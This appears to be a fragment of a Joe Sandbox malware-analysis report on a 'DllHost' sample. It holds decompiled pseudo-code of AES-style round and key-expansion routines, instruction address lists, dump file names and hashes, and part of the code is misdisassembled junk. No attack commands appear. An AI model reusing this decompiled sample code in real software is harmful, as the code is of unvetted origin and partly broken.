				r9d =  *(0x7ff7191b0000 + 0x4e840 + (_t1412 >> 0x18) * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1364 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1364 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1364 * 4) ^  *(_t1418 + 0x7c);
				_t1366 = _t1364 >> 0x18 >> 0x18;
				_t1385 = _t1384 >> 0x18;
				r8d =  *(0x7ff7191b0000 + 0x4e840 + _t1385 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r8d = r8d ^  *(0x7ff7191b0000 + 0x4dc40 + _t1366 * 4);
				r8d = r8d ^  *(_t1418 + 0x88);
				_t1367 = _t1366 >> 0x18;
				r9d =  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1366 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1366 * 4) ^  *(0x7ff7191b0000 + 0x4e840 + _t1367 * 4) ^  *(_t1418 + 0x8c);
				r11d =  *(0x7ff7191b0000 + 0x4dc40 + _t1385 * 4);
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e040 + _t1378 * 4);
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e440 + _t1378 * 4);
				_t1370 = _t1367 >> 0x18 >> 0x18 >> 0x18;
				_t1379 = _t1378 >> 0x18;
				r11d = r11d ^  *(0x7ff7191b0000 + 0x4e840 + _t1370 * 4);
				r11d = r11d ^  *(_t1418 + 0x98);
				r8d =  *(0x7ff7191b0000 + 0x4e840 + _t1379 * 4) ^  *(0x7ff7191b0000 + 0x4dc40 + _t1370 * 4) ^  *(0x7ff7191b0000 + 0x4e040 + _t1370 * 4) ^  *(0x7ff7191b0000 + 0x4e440 + _t1370 * 4) ^  *(_t1418 + 0x9c);
				r15d =  *(0x7ff7191b0000 + 0x4b000 + _t1379 * 4);
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4ac00 + _t1370 * 4);
				_t1371 = _t1370 >> 0x18;
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4b800 + _t1371 * 4);
				_t1372 = _t1371 >> 0x18;
				r15d = r15d ^  *(0x7ff7191b0000 + 0x4b400 + _t1379 * 4);
				r15d = r15d ^  *(_t1418 + 0xa0);
				r14d =  *(0x7ff7191b0000 + 0x4ac00 + _t1379 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4b800 + _t1372 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4b400 + _t1379 * 4);
				r14d = r14d ^  *(0x7ff7191b0000 + 0x4b000 + _t1379 * 4);
				r13d =  *(0x7ff7191b0000 + 0x4b800 + (_t1385 >> 0x18) * 4);
				r14d = r14d ^  *(_t1418 + 0xa4);
				_t1387 = _t1402[0x16];
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4b400 + _t1379 * 4);
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4b000 + _t1379 * 4);
				r13d = r13d ^  *(0x7ff7191b0000 + 0x4ac00 + _t1372 * 4);
				r13d = r13d ^  *(_t1418 + 0xa8);
				r12d =  *(0x7ff7191b0000 + 0x4b400 + _t1379 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4b000 + _t1372 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4ac00 + _t1372 * 4);
				r12d = r12d ^  *(0x7ff7191b0000 + 0x4b800 + (_t1372 >> 0x18) * 4);
				r12d = r12d ^  *(_t1402[0x18] + 0xac);
				 *_t1387 = r15d;
				_t1387[1] = r14d;
				_t1387[2] = r13d;
				_t1387[3] = r12d;
				return 0;
			}


















































                                                                                                                                                              0x7ff7191cac70
                                                                                                                                                              0x7ff7191cac73
                                                                                                                                                              0x7ff7191cac77
                                                                                                                                                              0x7ff7191cac7c
                                                                                                                                                              0x7ff7191cac83
                                                                                                                                                              0x7ff7191cac91
                                                                                                                                                              0x7ff7191cac97
                                                                                                                                                              0x7ff7191cac9a
                                                                                                                                                              0x7ff7191caca0
                                                                                                                                                              0x7ff7191caca4
                                                                                                                                                              0x7ff7191cacaf
                                                                                                                                                              0x7ff7191cacb3
                                                                                                                                                              0x7ff7191cacb7
                                                                                                                                                              0x7ff7191cacbb
                                                                                                                                                              0x7ff7191cacbf
                                                                                                                                                              0x7ff7191cacc3
                                                                                                                                                              0x7ff7191cacc7
                                                                                                                                                              0x7ff7191caccb
                                                                                                                                                              0x7ff7191caccf
                                                                                                                                                              0x7ff7191cacd3
                                                                                                                                                              0x7ff7191cacd7
                                                                                                                                                              0x7ff7191cacdb
                                                                                                                                                              0x7ff7191cace1
                                                                                                                                                              0x7ff7191cace5
                                                                                                                                                              0x7ff7191cace9
                                                                                                                                                              0x7ff7191cacf4
                                                                                                                                                              0x7ff7191cacfd
                                                                                                                                                              0x7ff7191cad06
                                                                                                                                                              0x7ff7191cad0c
                                                                                                                                                              0x7ff7191cad2f
                                                                                                                                                              0x7ff7191cad37
                                                                                                                                                              0x7ff7191cad3b
                                                                                                                                                              0x7ff7191cad46
                                                                                                                                                              0x7ff7191cad49
                                                                                                                                                              0x7ff7191cad59
                                                                                                                                                              0x7ff7191cad64
                                                                                                                                                              0x7ff7191cad77
                                                                                                                                                              0x7ff7191cad7d
                                                                                                                                                              0x7ff7191cad85
                                                                                                                                                              0x7ff7191cad8d
                                                                                                                                                              0x7ff7191cad99
                                                                                                                                                              0x7ff7191cad9d
                                                                                                                                                              0x7ff7191cada1
                                                                                                                                                              0x7ff7191cadac
                                                                                                                                                              0x7ff7191cadb6
                                                                                                                                                              0x7ff7191cadc8
                                                                                                                                                              0x7ff7191cadd4
                                                                                                                                                              0x7ff7191cadd7
                                                                                                                                                              0x7ff7191caddf
                                                                                                                                                              0x7ff7191cadfb
                                                                                                                                                              0x7ff7191cae03
                                                                                                                                                              0x7ff7191cae0b
                                                                                                                                                              0x7ff7191cae33
                                                                                                                                                              0x7ff7191cae37
                                                                                                                                                              0x7ff7191cae3d
                                                                                                                                                              0x7ff7191cae41
                                                                                                                                                              0x7ff7191cae4f
                                                                                                                                                              0x7ff7191cae5f
                                                                                                                                                              0x7ff7191cae6d
                                                                                                                                                              0x7ff7191cae75
                                                                                                                                                              0x7ff7191cae7f
                                                                                                                                                              0x7ff7191cae83
                                                                                                                                                              0x7ff7191cae9b
                                                                                                                                                              0x7ff7191caea3
                                                                                                                                                              0x7ff7191caeae
                                                                                                                                                              0x7ff7191caec5
                                                                                                                                                              0x7ff7191caecd
                                                                                                                                                              0x7ff7191caed5
                                                                                                                                                              0x7ff7191caedf
                                                                                                                                                              0x7ff7191caef1
                                                                                                                                                              0x7ff7191caef9
                                                                                                                                                              0x7ff7191caefd
                                                                                                                                                              0x7ff7191caf09
                                                                                                                                                              0x7ff7191caf0e
                                                                                                                                                              0x7ff7191caf19
                                                                                                                                                              0x7ff7191caf1d
                                                                                                                                                              0x7ff7191caf29
                                                                                                                                                              0x7ff7191caf31
                                                                                                                                                              0x7ff7191caf35
                                                                                                                                                              0x7ff7191caf3d
                                                                                                                                                              0x7ff7191caf44
                                                                                                                                                              0x7ff7191caf88
                                                                                                                                                              0x7ff7191cafae
                                                                                                                                                              0x7ff7191cafd3
                                                                                                                                                              0x7ff7191cafd7
                                                                                                                                                              0x7ff7191cafdb
                                                                                                                                                              0x7ff7191cafe3
                                                                                                                                                              0x7ff7191caff4
                                                                                                                                                              0x7ff7191caffb
                                                                                                                                                              0x7ff7191cafff
                                                                                                                                                              0x7ff7191cb007
                                                                                                                                                              0x7ff7191cb044
                                                                                                                                                              0x7ff7191cb047
                                                                                                                                                              0x7ff7191cb04b
                                                                                                                                                              0x7ff7191cb053
                                                                                                                                                              0x7ff7191cb062
                                                                                                                                                              0x7ff7191cb06a
                                                                                                                                                              0x7ff7191cb075
                                                                                                                                                              0x7ff7191cb087
                                                                                                                                                              0x7ff7191cb08b
                                                                                                                                                              0x7ff7191cb096
                                                                                                                                                              0x7ff7191cb09e
                                                                                                                                                              0x7ff7191cb0a9
                                                                                                                                                              0x7ff7191cb0b0
                                                                                                                                                              0x7ff7191cb0b5
                                                                                                                                                              0x7ff7191cb0c0
                                                                                                                                                              0x7ff7191cb0ce
                                                                                                                                                              0x7ff7191cb0d6
                                                                                                                                                              0x7ff7191cb0e0
                                                                                                                                                              0x7ff7191cb0e7
                                                                                                                                                              0x7ff7191cb0fb
                                                                                                                                                              0x7ff7191cb0ff
                                                                                                                                                              0x7ff7191cb107
                                                                                                                                                              0x7ff7191cb10f
                                                                                                                                                              0x7ff7191cb114
                                                                                                                                                              0x7ff7191cb11c
                                                                                                                                                              0x7ff7191cb127
                                                                                                                                                              0x7ff7191cb133
                                                                                                                                                              0x7ff7191cb13b
                                                                                                                                                              0x7ff7191cb146
                                                                                                                                                              0x7ff7191cb14e
                                                                                                                                                              0x7ff7191cb192
                                                                                                                                                              0x7ff7191cb1b8
                                                                                                                                                              0x7ff7191cb1de
                                                                                                                                                              0x7ff7191cb1e2
                                                                                                                                                              0x7ff7191cb1e6
                                                                                                                                                              0x7ff7191cb1ee
                                                                                                                                                              0x7ff7191cb209
                                                                                                                                                              0x7ff7191cb20d
                                                                                                                                                              0x7ff7191cb211
                                                                                                                                                              0x7ff7191cb219
                                                                                                                                                              0x7ff7191cb21d
                                                                                                                                                              0x7ff7191cb224
                                                                                                                                                              0x7ff7191cb229
                                                                                                                                                              0x7ff7191cb231
                                                                                                                                                              0x7ff7191cb23d
                                                                                                                                                              0x7ff7191cb249
                                                                                                                                                              0x7ff7191cb254
                                                                                                                                                              0x7ff7191cb26b
                                                                                                                                                              0x7ff7191cb273
                                                                                                                                                              0x7ff7191cb27b
                                                                                                                                                              0x7ff7191cb286
                                                                                                                                                              0x7ff7191cb28a
                                                                                                                                                              0x7ff7191cb295
                                                                                                                                                              0x7ff7191cb2a4
                                                                                                                                                              0x7ff7191cb2d4
                                                                                                                                                              0x7ff7191cb32a
                                                                                                                                                              0x7ff7191cb363
                                                                                                                                                              0x7ff7191cb3d0
                                                                                                                                                              0x7ff7191cb3f8
                                                                                                                                                              0x7ff7191cb405
                                                                                                                                                              0x7ff7191cb409
                                                                                                                                                              0x7ff7191cb413
                                                                                                                                                              0x7ff7191cb41b
                                                                                                                                                              0x7ff7191cb420
                                                                                                                                                              0x7ff7191cb423
                                                                                                                                                              0x7ff7191cb43b
                                                                                                                                                              0x7ff7191cb467
                                                                                                                                                              0x7ff7191cb46e
                                                                                                                                                              0x7ff7191cb476
                                                                                                                                                              0x7ff7191cb480
                                                                                                                                                              0x7ff7191cb484
                                                                                                                                                              0x7ff7191cb497
                                                                                                                                                              0x7ff7191cb49b
                                                                                                                                                              0x7ff7191cb4a3
                                                                                                                                                              0x7ff7191cb4cc
                                                                                                                                                              0x7ff7191cb4e0
                                                                                                                                                              0x7ff7191cb504
                                                                                                                                                              0x7ff7191cb513
                                                                                                                                                              0x7ff7191cb51b
                                                                                                                                                              0x7ff7191cb523
                                                                                                                                                              0x7ff7191cb530
                                                                                                                                                              0x7ff7191cb552
                                                                                                                                                              0x7ff7191cb572
                                                                                                                                                              0x7ff7191cb5df
                                                                                                                                                              0x7ff7191cb5e7
                                                                                                                                                              0x7ff7191cb60f
                                                                                                                                                              0x7ff7191cb613
                                                                                                                                                              0x7ff7191cb620
                                                                                                                                                              0x7ff7191cb627
                                                                                                                                                              0x7ff7191cb62f
                                                                                                                                                              0x7ff7191cb637
                                                                                                                                                              0x7ff7191cb640
                                                                                                                                                              0x7ff7191cb674
                                                                                                                                                              0x7ff7191cb677
                                                                                                                                                              0x7ff7191cb67f
                                                                                                                                                              0x7ff7191cb689
                                                                                                                                                              0x7ff7191cb68d
                                                                                                                                                              0x7ff7191cb6a0
                                                                                                                                                              0x7ff7191cb6a4
                                                                                                                                                              0x7ff7191cb6ac
                                                                                                                                                              0x7ff7191cb6d4
                                                                                                                                                              0x7ff7191cb6e5
                                                                                                                                                              0x7ff7191cb706
                                                                                                                                                              0x7ff7191cb715
                                                                                                                                                              0x7ff7191cb71d
                                                                                                                                                              0x7ff7191cb725
                                                                                                                                                              0x7ff7191cb737
                                                                                                                                                              0x7ff7191cb75d
                                                                                                                                                              0x7ff7191cb777
                                                                                                                                                              0x7ff7191cb7e6
                                                                                                                                                              0x7ff7191cb816
                                                                                                                                                              0x7ff7191cb81a
                                                                                                                                                              0x7ff7191cb827
                                                                                                                                                              0x7ff7191cb82e
                                                                                                                                                              0x7ff7191cb836
                                                                                                                                                              0x7ff7191cb83e
                                                                                                                                                              0x7ff7191cb847
                                                                                                                                                              0x7ff7191cb87b
                                                                                                                                                              0x7ff7191cb8a7
                                                                                                                                                              0x7ff7191cb8de
                                                                                                                                                              0x7ff7191cb8f2
                                                                                                                                                              0x7ff7191cb919
                                                                                                                                                              0x7ff7191cb928
                                                                                                                                                              0x7ff7191cb930
                                                                                                                                                              0x7ff7191cb938
                                                                                                                                                              0x7ff7191cb966
                                                                                                                                                              0x7ff7191cb983
                                                                                                                                                              0x7ff7191cb9f4
                                                                                                                                                              0x7ff7191cba1b
                                                                                                                                                              0x7ff7191cba29
                                                                                                                                                              0x7ff7191cba38
                                                                                                                                                              0x7ff7191cba42
                                                                                                                                                              0x7ff7191cba46
                                                                                                                                                              0x7ff7191cba4e
                                                                                                                                                              0x7ff7191cba9c
                                                                                                                                                              0x7ff7191cbaa3
                                                                                                                                                              0x7ff7191cbaab
                                                                                                                                                              0x7ff7191cbab5
                                                                                                                                                              0x7ff7191cbab9
                                                                                                                                                              0x7ff7191cbacc
                                                                                                                                                              0x7ff7191cbad0
                                                                                                                                                              0x7ff7191cbad8
                                                                                                                                                              0x7ff7191cbae3
                                                                                                                                                              0x7ff7191cbaeb
                                                                                                                                                              0x7ff7191cbb0a
                                                                                                                                                              0x7ff7191cbb1d
                                                                                                                                                              0x7ff7191cbb25
                                                                                                                                                              0x7ff7191cbb2d
                                                                                                                                                              0x7ff7191cbb35
                                                                                                                                                              0x7ff7191cbb43
                                                                                                                                                              0x7ff7191cbb52
                                                                                                                                                              0x7ff7191cbb5a
                                                                                                                                                              0x7ff7191cbb62
                                                                                                                                                              0x7ff7191cbb71
                                                                                                                                                              0x7ff7191cbb79
                                                                                                                                                              0x7ff7191cbb85
                                                                                                                                                              0x7ff7191cbb94
                                                                                                                                                              0x7ff7191cbb9c
                                                                                                                                                              0x7ff7191cbbb4
                                                                                                                                                              0x7ff7191cbbbc
                                                                                                                                                              0x7ff7191cbbc5
                                                                                                                                                              0x7ff7191cbbce
                                                                                                                                                              0x7ff7191cbbdc

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: bb8391b5e9cca6cee1b864bbcc68e111c838af6b1a21bc96352ef4f71ce710c0
                                                                                                                                                              • Instruction ID: 6c0b47f24954d157fa101162837e6868c8d828f4357721f46621d46d4c19e002
                                                                                                                                                              • Opcode Fuzzy Hash: bb8391b5e9cca6cee1b864bbcc68e111c838af6b1a21bc96352ef4f71ce710c0
                                                                                                                                                              • Instruction Fuzzy Hash: BD82A2B36202688BE355CF1EE4588AB33A8F79834DBC61705EB8157386D63CF811DB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191DEC6C Relevance: .5, Instructions: 535COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4612019fec618f4ed7c1b7b7286a7f972c951cb2dae7ab42fd16c42eb7cd047a
                                                                                                                                                              • Instruction ID: 83268227b4464569f6b9cb5e7d3fa40cfa8b8412942196ea024808edf7412ac1
                                                                                                                                                              • Opcode Fuzzy Hash: 4612019fec618f4ed7c1b7b7286a7f972c951cb2dae7ab42fd16c42eb7cd047a
                                                                                                                                                              • Instruction Fuzzy Hash: 23427721D29E4689F293AF36A415935A375BF563E8FC48333E80E37650DF2CE55B8260
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191C9D5C Relevance: .4, Instructions: 388COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00007FF77FF7191C9D5C(void* __eax, void* __ebx, void* __ecx, unsigned int __rax, long long __rbx, signed int __rcx, unsigned int __rdx, long long __rdi, long long __rsi) {
				void* _t171;
				void* _t222;
				signed int _t348;
				signed int _t354;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t406;
				signed int _t407;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				unsigned long long _t415;
				unsigned long long _t416;
				unsigned long long _t417;
				unsigned long long _t418;
				unsigned long long _t419;
				unsigned long long _t420;
				unsigned long long _t421;
				unsigned long long _t422;
				long long _t434;
				void* _t437;

				 *__rax =  *__rax + __eax;
				asm("dec ebx");
				 *__rax =  *__rax + __eax;
				_push(__rbx);
				asm("popfd");
				 *__rax =  *__rax + __eax;
				 *((intOrPtr*)(__rbx)) =  *((intOrPtr*)(__rbx)) + __eax;
				_t171 = __eax +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx));
				 *((intOrPtr*)(__rbx)) =  *((intOrPtr*)(__rbx)) + _t171;
				_t222 = _t171 +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx));
				 *((intOrPtr*)(__rbx)) =  *((intOrPtr*)(__rbx)) + _t222;
				 *((intOrPtr*)(__rbx)) =  *((intOrPtr*)(__rbx)) + _t222 +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx)) +  *((intOrPtr*)(__rbx));
				asm("int3");
				asm("int3");
				 *((long long*)(_t437 + 8)) = __rbx;
				 *((long long*)(_t437 + 0x10)) = _t434;
				 *((long long*)(_t437 + 0x18)) = __rsi;
				 *((long long*)(_t437 + 0x20)) = __rdi;
				r9d =  *__rcx;
				 *__rdx = r9d;
				_t402 =  *(__rcx + 4);
				 *(__rdx + 4) = _t402;
				r10d =  *(__rcx + 8);
				 *(__rdx + 8) = r10d;
				r8d =  *(__rcx + 0xc);
				 *(__rdx + 0xc) = r8d;
				r11d = r8d;
				_t348 =  *(0x191fac00 + 0x800 + (__rdx >> 0x18) * 4) ^  *(0x191fac00 + 0x400 + __rcx * 4) ^  *(0x191fac00 + __rcx * 4) ^  *(0x191fac00 + 0xc00 + __rax * 4) ^ r9d ^  *0x191fdc00;
				 *(__rdx + 0x10) = _t348;
				_t403 = _t402 ^ _t348;
				 *(__rdx + 0x14) = _t403;
				r9d = _t403;
				r9d = r9d ^ r10d;
				r11d = r11d ^ r9d;
				 *(__rdx + 0x18) = r9d;
				_t387 = r11d;
				 *(__rdx + 0x1c) = _t387;
				r10d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				_t415 = __rax >> 0x18;
				r10d = r10d ^  *(0x191fac00 + 0x800 + _t415 * 4);
				r10d = r10d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r10d = r10d ^  *(0x191fac00 + __rcx * 4);
				r10d = r10d ^ _t348;
				r10d = r10d ^  *0x191fdc04;
				 *(__rdx + 0x20) = r10d;
				_t404 = _t403 ^ r10d;
				 *(__rdx + 0x24) = _t404;
				r8d = _t404;
				r8d = r8d ^ r9d;
				_t388 = _t387 ^ r8d;
				 *(__rdx + 0x28) = r8d;
				 *(__rdx + 0x2c) = _t388;
				_t416 = _t415 >> 0x18;
				r11d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + 0x800 + _t416 * 4);
				r11d = r11d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + __rcx * 4);
				r11d = r11d ^ r10d;
				r11d = r11d ^  *0x191fdc08;
				_t405 = _t404 ^ r11d;
				 *(__rdx + 0x30) = r11d;
				r9d = _t405;
				 *(__rdx + 0x34) = _t405;
				r9d = r9d ^ r8d;
				 *(__rdx + 0x38) = r9d;
				_t389 = r9d ^ _t388;
				_t417 = _t416 >> 0x18;
				 *(__rdx + 0x3c) = _t389;
				_t354 =  *(0x191fac00 + 0xc00 + __rcx * 4) ^  *(0x191fac00 + 0x800 + _t417 * 4) ^  *(0x191fac00 + 0x400 + __rcx * 4) ^  *(0x191fac00 + __rcx * 4) ^ r11d ^  *0x191fdc0c;
				 *(__rdx + 0x40) = _t354;
				_t406 = _t405 ^ _t354;
				 *(__rdx + 0x44) = _t406;
				r8d = _t406;
				r8d = r8d ^ r9d;
				 *(__rdx + 0x48) = r8d;
				_t390 = r8d ^ _t389;
				_t418 = _t417 >> 0x18;
				 *(__rdx + 0x4c) = _t390;
				r10d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0x191fac00 + 0x800 + _t418 * 4);
				r10d = r10d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r10d = r10d ^  *(0x191fac00 + __rcx * 4);
				r10d = r10d ^  *0x191fdc10;
				r10d = r10d ^ _t354;
				 *(__rdx + 0x50) = r10d;
				_t407 = _t406 ^ r10d;
				 *(__rdx + 0x54) = _t407;
				r9d = _t407;
				r9d = r9d ^ r8d;
				 *(__rdx + 0x58) = r9d;
				_t391 = r9d ^ _t390;
				_t419 = _t418 >> 0x18;
				 *(__rdx + 0x5c) = _t391;
				r11d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + 0x800 + _t419 * 4);
				r11d = r11d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + __rcx * 4);
				r11d = r11d ^ r10d;
				r11d = r11d ^  *0x191fdc14;
				_t408 = _t407 ^ r11d;
				 *(__rdx + 0x60) = r11d;
				 *(__rdx + 0x64) = _t408;
				r8d = _t408;
				r8d = r8d ^ r9d;
				 *(__rdx + 0x68) = r8d;
				_t392 = r8d ^ _t391;
				_t420 = _t419 >> 0x18;
				 *(__rdx + 0x6c) = _t392;
				r10d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r10d = r10d ^  *(0x191fac00 + 0x800 + _t420 * 4);
				r10d = r10d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r10d = r10d ^  *(0x191fac00 + __rcx * 4);
				r10d = r10d ^ r11d;
				r10d = r10d ^  *0x191fdc18;
				 *(__rdx + 0x70) = r10d;
				_t409 = _t408 ^ r10d;
				 *(__rdx + 0x74) = _t409;
				r9d = _t409;
				r9d = r9d ^ r8d;
				 *(__rdx + 0x78) = r9d;
				_t393 = r9d ^ _t392;
				_t421 = _t420 >> 0x18;
				 *(__rdx + 0x7c) = _t393;
				r11d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + 0x800 + _t421 * 4);
				r11d = r11d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r11d = r11d ^  *(0x191fac00 + __rcx * 4);
				r11d = r11d ^ r10d;
				r11d = r11d ^  *0x191fdc1c;
				 *(__rdx + 0x80) = r11d;
				_t410 = _t409 ^ r11d;
				 *(__rdx + 0x84) = _t410;
				r10d = _t410;
				r10d = r10d ^ r9d;
				 *(__rdx + 0x88) = r10d;
				r8d = r10d ^ _t393;
				_t422 = _t421 >> 0x18;
				 *(__rdx + 0x8c) = r8d;
				r9d =  *(0x191fac00 + 0xc00 + __rcx * 4);
				r9d = r9d ^  *(0x191fac00 + 0x800 + _t422 * 4);
				r9d = r9d ^  *(0x191fac00 + 0x400 + __rcx * 4);
				r9d = r9d ^  *(0x191fac00 + __rcx * 4);
				r9d = r9d ^ r11d;
				r9d = r9d ^  *0x191fdc20;
				 *(__rdx + 0x90) = r9d;
				_t411 = _t410 ^ r9d;
				 *(__rdx + 0x94) = _t411;
				r10d = r10d ^ _t411;
				r8d = r8d ^ r10d;
				 *(__rdx + 0x98) = r10d;
				 *(__rdx + 0x9c) = r8d;
				_t399 =  *(0x191fac00 + 0xc00 + __rcx * 4) ^  *(0x191fac00 + 0x800 + (_t422 >> 0x18) * 4) ^  *(0x191fac00 + 0x400 + __rcx * 4) ^  *(0x191fac00 + __rcx * 4) ^ r9d ^  *0x191fdc24;
				 *(__rdx + 0xa0) = _t399;
				_t400 = _t399 ^ _t411;
				 *(__rdx + 0xa4) = _t400;
				_t401 = _t400 ^ r10d;
				r8d = r8d ^ _t401;
				 *((intOrPtr*)(__rdx + 0xf0)) = 0;
				 *(__rdx + 0xac) = r8d;
				 *(__rdx + 0xa8) = _t401;
				 *((char*)(__rdx + 0xf0)) = 0xa0;
				return 0;
			}





































                                                                                                                                                              0x7ff7191c9d62
                                                                                                                                                              0x7ff7191c9d64
